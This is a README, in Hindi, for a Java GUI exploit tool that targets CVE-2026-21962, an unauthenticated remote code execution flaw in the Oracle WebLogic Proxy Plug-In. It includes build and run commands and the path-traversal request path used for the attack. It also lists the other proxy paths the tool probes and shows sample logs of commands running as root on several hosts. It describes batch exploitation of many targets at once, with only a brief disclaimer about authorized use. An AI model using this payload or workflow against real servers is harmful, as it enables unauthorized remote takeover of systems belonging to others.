
जावा GUI टूल जो CVE-2026-21962 का शोषण करने के लिए है, जो Oracle WebLogic Proxy Plug-In में एक अनधिकृत RCE है, जो HTTP के माध्यम से मल्टी-टारगेट कमांड निष्पादन को सक्षम बनाता है।
Oracle WebLogic Server Proxy Plug-In RCE (रिमोट कोड एक्ज़ीक्यूशन) भेद्यता शोषण उपकरण का Java GUI संस्करण।
java-version/
├── pom.xml # Maven प्रोजेक्ट कॉन्फ़िगरेशन फ़ाइल
├── README.md # प्रोजेक्ट दस्तावेज़ीकरण
├── run.bat # Windows स्टार्टअप स्क्रिप्ट
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # प्रोग्राम एंट्री पॉइंट
├── core/
│ └── Exploit.java # शोषण कोर लॉजिक
├── gui/
│ └── MainWindow.java # GUI मुख्य विंडो
└── util/
└── HttpClient.java # HTTP अनुरोध उपकरण
प्रोग्राम विंडो में निम्नलिखित क्षेत्र शामिल हैं:
इनपुट पैरामीटर क्षेत्र (शीर्ष)
बटन क्षेत्र (मध्य)
निष्पादन लॉग क्षेत्र (नीचे बाईं ओर)
कमांड आउटपुट क्षेत्र (नीचे दाईं ओर)
cd java-version
mvn clean compile
mvn clean package
पैकेज किया गया JAR फ़ाइल यहां स्थित है: target/cve-2026-21962-1.0.0.jar
प्रोग्राम शुरू करने के लिए run.bat फ़ाइल पर डबल-क्लिक करें
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[निर्भरता jar पथ]" com.ashwesker.cve202621962.Main
लक्ष्य URL:
http://192.168.1.100:7001
निष्पादन कमांड:
whoami
लक्ष्य URL:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
निष्पादन कमांड:
id
आउटपुट परिणाम उदाहरण:
[*] भेद्यता परीक्षण शुरू...
[*] लक्ष्य URL: http://192.168.1.100:7001
[*] निष्पादन कमांड: id
[*] परीक्षण पथ: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] सफल! स्थिति कोड: 200
[+] कमांड निष्पादन सफल!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] भेद्यता परीक्षण शुरू...
[*] लक्ष्य URL: http://192.168.1.101:7001
[*] निष्पादन कमांड: id
[*] परीक्षण पथ: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] सफल! स्थिति कोड: 200
[+] कमांड निष्पादन सफल!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
प्रोग्राम शुरू करने के बाद, "लक्ष्य URL" टेक्स्ट क्षेत्र में लक्ष्य सर्वर पता दर्ज करें
http://target:7001 या https://oracle-server:4443"निष्पादन कमांड" फ़ील्ड में निष्पादित किए जाने वाले कमांड को दर्ज करें
whoami, id, powershell -c ... आदिपरीक्षण शुरू करने के लिए "शोषण निष्पादन" बटन पर क्लिक करें
परीक्षण प्रक्रिया जानने के लिए नीचे "निष्पादन लॉग" देखें
कमांड निष्पादन परिणाम प्राप्त करने के लिए नीचे "कमांड आउटपुट" देखें
"लक्ष्य URL" टेक्स्ट क्षेत्र में कई लक्ष्य पते दर्ज करें, प्रत्येक पंक्ति में एक
http://target1:7001
http://target2:7001
https://target3:4443
"निष्पादन कमांड" फ़ील्ड में निष्पादित किए जाने वाले कमांड को दर्ज करें
बैच परीक्षण शुरू करने के लिए "शोषण निष्पादन" बटन पर क्लिक करें
प्रोग्राम प्रत्येक लक्ष्य का क्रमिक रूप से परीक्षण करेगा, विभिन्न लक्ष्यों के आउटपुट परिणामों के बीच ================ (80 बराबर चिह्न) से विभाजित
प्रत्येक लक्ष्य की परीक्षण प्रक्रिया जानने के लिए नीचे "निष्पादन लॉग" देखें
सभी लक्ष्यों के कमांड निष्पादन परिणाम प्राप्त करने के लिए नीचे "कमांड आउटपुट" देखें
प्रोग्राम स्वचालित रूप से निम्नलिखित पथों का परीक्षण करेगा:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग से सिस्टम पर हमला करना अवैध है।
Main.java
Exploit.java
MainWindow.java
HttpClient.java
यह प्रोजेक्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।